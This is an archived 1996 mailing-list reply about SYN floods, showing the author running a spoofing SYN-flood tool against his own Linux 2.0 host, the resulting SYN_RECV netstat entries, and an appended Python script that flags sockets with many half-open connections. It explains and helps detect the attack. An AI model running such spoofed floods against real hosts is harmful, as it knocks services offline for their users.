SYN floods (was: does history repeat itself?)
Taner Halicioglu
taner at CERF.NET
Tue Sep 10 02:35:45 UTC 1996

On Mon, 9 Sep 1996, Vektor Sigma wrote:
> On my private network I can send 600 or more SYN packets to my telnet port
> (w/faked, unreachable source addresses + random seq numbers), yet the
> port doesn't seem to be flooded.
>
> It's a linux box.
>
> The telnet daemon seems to be able to tell the difference between a faked
> packet and a real one. Even when spoofing from localhost, it reports a
> connection from unknown.
>
> Obviously, there seems to be a solution to this problem. ??

I'd like to see this. First of all, the telnet daemon never sees the SYN.
The SYN is responded to by the kernel (with a SYN/ACK).
taner at BOOM:ttyp6 (Linux) ~/code >./syn
./syn srchost dsthost port num
taner at BOOM:ttyp6 (Linux) ~/code >./syn 1.2.3.4 boom.net 23 10
synflooding boom.net from 1.2.3.4 port 23 10 times
Now to try to connect to it...
taner at nic:~ >telnet boom.net
Trying 134.24.7.153 ...
telnet: connect: Connection timed out
telnet>
And why?
taner at BOOM:ttyp6 (Linux) ~ >netstat -tn | grep 1.2.3.4
tcp 0 1 134.24.7.153:23 1.2.3.4:59914 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60170 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60426 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60682 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60938 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61194 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61706 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61962 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:62218 SYN_RECV root
taner at BOOM:ttyp6 (Linux) ~ >uname -a
Linux BOOM.NET 2.0.0 #5 Sun Sep 1 21:34:31 PDT 1996 i486
Looks like Linux can only queue 9 SYNs...
-Taner
-=-=-=-=-=-=-=-=-=-=-=-=[ D. Taner Halicioglu ]=-=-=-=-=-=-=-=-=-=-=-=-
taner at CERF.NET -=- taner at ucsd.edu -=- taner at sdsc.edu
IRC Admin: irc.cerf.net -=- U. of California, San Diego, Computer Sci.
taner at cisco.com -=- Cisco Systems -=- Enterprise Network Management
-=-=-=-=-=-=[ Linux 2.0.* OS -- http://www.sdsc.edu/~taner/ ]=-=-=-=-=-
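
Added example, not part of the original message: a Python version of the check done by eye on the netstat output above, counting half-open (SYN_RECV) entries per listening socket and flagging a socket whose count reaches the backlog limit. The function names are hypothetical, and the threshold of 9 is only the figure observed in this message for Linux 2.0.0, an assumption for any other system.

```python
"""Count half-open (SYN_RECV) TCP entries per listening socket in `netstat -tn` output."""
from collections import Counter, defaultdict

# Rows copied from the netstat output in the message above; the last
# (ESTABLISHED) row is constructed to show that it is ignored.
SAMPLE = """\
tcp 0 1 134.24.7.153:23 1.2.3.4:59914 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60170 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60426 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60682 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:60938 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61194 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61706 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:61962 SYN_RECV root
tcp 0 1 134.24.7.153:23 1.2.3.4:62218 SYN_RECV root
tcp 0 0 134.24.7.153:22 192.0.2.10:40000 ESTABLISHED root
"""


def parse_half_open(netstat_text):
    """Return {local_socket: Counter(remote_ip -> count)} for SYN_RECV rows."""
    half_open = defaultdict(Counter)
    for line in netstat_text.splitlines():
        fields = line.split()
        # Columns: proto recv-q send-q local remote state [user]
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue
        local, remote, state = fields[3], fields[4], fields[5]
        if state == "SYN_RECV":
            half_open[local][remote.rsplit(":", 1)[0]] += 1
    return half_open


def saturated(half_open, threshold=9):
    """Return (local_socket, total, top_source) for sockets at or over threshold."""
    # Sources may be spoofed, so the per-socket total is the signal;
    # the top source is reported only as a hint.
    alerts = []
    for local, sources in sorted(half_open.items()):
        total = sum(sources.values())
        if total >= threshold:
            alerts.append((local, total, sources.most_common(1)[0][0]))
    return alerts


if __name__ == "__main__":
    for local, total, src in saturated(parse_half_open(SAMPLE)):
        print(f"{local}: {total} half-open connections, mostly from {src}")
```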